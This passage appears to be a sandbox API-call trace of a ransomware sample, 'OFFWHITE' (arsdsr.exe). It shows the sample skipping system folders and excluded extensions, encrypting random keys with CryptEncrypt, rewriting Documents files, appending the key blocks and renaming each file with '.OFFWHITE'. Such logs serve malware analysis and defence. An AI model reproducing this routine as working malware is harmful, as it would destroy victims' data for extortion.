(lpString1=".pst", lpString2=".exe") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".log") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".cab") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".cmd") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".com") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".cpl") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".ini") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".dll") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".url") returned -1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".ttf") returned -1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".mp3") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".pif") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".mp4") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".OFFWHITE") returned 1 [0134.021] lstrcmpiW (lpString1=".pst", lpString2=".msi") returned 1 [0134.021] lstrcmpiW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.021] GetProcessHeap () returned 0x500000 [0134.021] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f818 [0134.021] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0134.023] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=271360) returned 1 [0134.023] GetProcessHeap () returned 0x500000 [0134.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.023] GetProcessHeap () returned 0x500000 [0134.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.023] GetProcessHeap () returned 0x500000 [0134.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.023] GetProcessHeap () returned 0x500000 [0134.023] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.023] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.023] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.023] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.023] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.023] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.024] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.024] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.024] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.024] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc90*=0x100) returned 1 [0134.024] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.024] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.024] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0134.024] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x42400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.024] SetLastError (dwErrCode=0x0) [0134.024] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0134.194] GetLastError () returned 0x0 [0134.194] GetLastError () returned 0x0 [0134.194] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x42500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.195] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0134.195] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x42600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.195] WriteFile (in: hFile=0x21c, lpBuffer=0x53f818*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f818*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0134.195] GetProcessHeap () returned 0x500000 [0134.195] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x42400) returned 0x55a7b8 [0134.196] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.196] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x42400, lpOverlapped=0x0) returned 1 [0134.217] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.218] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x42400, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x42400, lpOverlapped=0x0) returned 1 [0134.219] GetProcessHeap () returned 0x500000 [0134.219] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.219] CloseHandle (hObject=0x21c) returned 1 [0134.223] GetProcessHeap () returned 0x500000 [0134.223] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.223] GetProcessHeap () returned 0x500000 [0134.223] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.223] GetProcessHeap () returned 0x500000 [0134.223] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.223] GetProcessHeap () returned 0x500000 [0134.223] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.223] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" [0134.223] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.OFFWHITE" [0134.223] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.offwhite")) returned 1 [0134.224] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x295debc, dwReserved1=0x42f7e62f, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0134.224] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0134.225] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc522e570, ftCreationTime.dwHighDateTime=0x1d59c21, ftLastAccessTime.dwLowDateTime=0xd44a2800, ftLastAccessTime.dwHighDateTime=0x1d5cee5, ftLastWriteTime.dwLowDateTime=0xd44a2800, ftLastWriteTime.dwHighDateTime=0x1d5cee5, nFileSizeHigh=0x0, nFileSizeLow=0x1841d, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="OymUVWYw.pptx", cAlternateFileName="OYMUVW~1.PPT")) returned 1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2=".") returned 1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="..") returned 1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="...") returned 1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="windows") returned -1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="$recycle.bin") returned 1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="rsa") returned -1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="ntuser.dat") returned 1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="programdata") returned -1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="appdata") returned 1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="program files") returned -1 [0134.225] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="program files (x86)") returned -1 [0134.225] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.225] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="OymUVWYw.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx" [0134.225] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.225] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.225] PathFindExtensionW (pszPath="OymUVWYw.pptx") returned=".pptx" [0134.225] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0134.225] lstrcmpiW (lpString1=".pptx", lpString2=".log") returned 1 [0134.225] lstrcmpiW (lpString1=".pptx", lpString2=".cab") returned 1 [0134.225] lstrcmpiW (lpString1=".pptx", lpString2=".cmd") returned 1 [0134.225] lstrcmpiW (lpString1=".pptx", lpString2=".com") returned 1 [0134.225] lstrcmpiW (lpString1=".pptx", lpString2=".cpl") returned 1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".ini") returned 1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".url") returned -1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".ttf") returned -1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".mp3") returned 1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".pif") returned 1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".mp4") returned 1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".OFFWHITE") returned 1 [0134.226] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0134.226] lstrcmpiW (lpString1="OymUVWYw.pptx", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.226] GetProcessHeap () returned 0x500000 [0134.226] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f828 [0134.226] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oymuvwyw.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.227] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=99357) returned 1 [0134.227] GetProcessHeap () returned 0x500000 [0134.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.227] GetProcessHeap () returned 0x500000 [0134.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.227] GetProcessHeap () returned 0x500000 [0134.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.227] GetProcessHeap () returned 0x500000 [0134.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.227] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.227] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.227] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.227] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.227] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.228] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.228] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.228] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.228] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1841d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.228] SetLastError (dwErrCode=0x0) [0134.228] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.232] GetLastError () returned 0x0 [0134.232] GetLastError () returned 0x0 [0134.232] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1851d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.233] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.233] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1861d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.233] WriteFile (in: hFile=0xb0, lpBuffer=0x53f828*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f828*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0134.233] GetProcessHeap () returned 0x500000 [0134.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1841d) returned 0x55a7b8 [0134.233] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.233] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x1841d, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x1841d, lpOverlapped=0x0) returned 1 [0134.241] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.241] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x1841d, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x1841d, lpOverlapped=0x0) returned 1 [0134.241] GetProcessHeap () returned 0x500000 [0134.241] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0134.241] CloseHandle (hObject=0xb0) returned 1 [0134.250] GetProcessHeap () returned 0x500000 [0134.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0134.250] GetProcessHeap () returned 0x500000 [0134.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0134.250] GetProcessHeap () returned 0x500000 [0134.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0134.250] GetProcessHeap () returned 0x500000 [0134.250] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0134.250] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx" [0134.250] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx.OFFWHITE" [0134.250] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oymuvwyw.pptx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OymUVWYw.pptx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oymuvwyw.pptx.offwhite")) returned 1 [0134.251] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4ed5070, ftCreationTime.dwHighDateTime=0x1d5daa5, ftLastAccessTime.dwLowDateTime=0xb87acd90, ftLastAccessTime.dwHighDateTime=0x1d5e539, ftLastWriteTime.dwLowDateTime=0xb87acd90, ftLastWriteTime.dwHighDateTime=0x1d5e539, nFileSizeHigh=0x0, nFileSizeLow=0xe5c4, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="pAoe_noDDZyBNR41.odt", cAlternateFileName="PAOE_N~1.ODT")) returned 1 [0134.251] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2=".") returned 1 [0134.251] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="..") returned 1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="...") returned 1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="windows") returned -1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="$recycle.bin") returned 1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="rsa") returned -1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="ntuser.dat") returned 1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="programdata") returned -1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="appdata") returned 1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="program files") returned -1 [0134.252] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="program files (x86)") returned -1 [0134.252] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0134.252] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="pAoe_noDDZyBNR41.odt" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt" [0134.252] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.252] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.252] PathFindExtensionW (pszPath="pAoe_noDDZyBNR41.odt") returned=".odt" [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".exe") returned 1 [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".log") returned 1 [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".cab") returned 1 [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".cmd") returned 1 [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".com") returned 1 [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".cpl") returned 1 [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0134.252] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0134.253] lstrcmpiW (lpString1=".odt", lpString2=".url") returned -1 [0134.253] lstrcmpiW (lpString1=".odt", lpString2=".ttf") returned -1 [0134.253] lstrcmpiW (lpString1=".odt", lpString2=".mp3") returned 1 [0134.253] lstrcmpiW (lpString1=".odt", lpString2=".pif") returned -1 [0134.253] lstrcmpiW (lpString1=".odt", lpString2=".mp4") returned 1 [0134.253] lstrcmpiW (lpString1=".odt", lpString2=".OFFWHITE") returned -1 [0134.253] lstrcmpiW (lpString1=".odt", lpString2=".msi") returned 1 [0134.253] lstrcmpiW (lpString1="pAoe_noDDZyBNR41.odt", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0134.253] GetProcessHeap () returned 0x500000 [0134.253] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f838 [0134.253] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pAoe_noDDZyBNR41.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\paoe_noddzybnr41.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0134.254] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=58820) returned 1 [0134.254] GetProcessHeap () returned 0x500000 [0134.254] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0134.254] GetProcessHeap () returned 0x500000 [0134.254] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0134.254] GetProcessHeap () returned 0x500000 [0134.254] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0134.254] GetProcessHeap () returned 0x500000 [0134.254] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0134.254] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.254] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.254] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0134.254] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.254] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.254] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0134.254] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.254] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.254] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0134.255] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0134.255] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0134.255] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0134.255] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xe5c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.255] SetLastError (dwErrCode=0x0) [0134.255] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.257] GetLastError () returned 0x0 [0134.257] GetLastError () returned 0x0 [0134.257] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xe6c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.257] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0134.258] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xe7c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.258] WriteFile (in: hFile=0xb0, lpBuffer=0x53f838*, 